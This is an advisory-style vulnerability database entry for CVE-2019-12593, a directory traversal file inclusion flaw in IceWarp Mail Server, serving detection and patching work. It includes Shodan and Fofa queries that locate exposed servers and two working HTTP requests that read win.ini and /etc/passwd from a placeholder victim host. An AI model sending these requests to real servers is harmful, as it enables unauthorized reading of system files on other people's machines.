🔙 목록으로 돌아가기

CVE-2019-12593: IceWarp Mail Server <=10.4.4 - Local File Inclusion

TitleIceWarp Mail Server <=10.4.4 - Local File Inclusion
Authorpikpikcu
SeverityHigh
ImpactAn attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
RemediationUpgrade IceWarp Mail Server to a version higher than 10.4.4 or apply the vendor-provided patch to fix the LFI vulnerability.
CVSS Score7.5
EPSS Score0.75083
CVE IDCVE-2019-12593
CWE IDCWE-22
Shodan Querytitle:"icewarp"http.title:"icewarp server administration"http.title:"icewarp"cpe:"cpe:2.3:a:icewarp:mail_server"
Fofa Querytitle="icewarp server administration"title="icewarp"
Tags cve cve2019 packetstorm lfi icewarp vkev vuln

🔍 Vulnerability Description

IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.

🌐 HTTP Request

GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:28.0) Gecko/20100101 Firefox/28.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-12593.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-12593.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A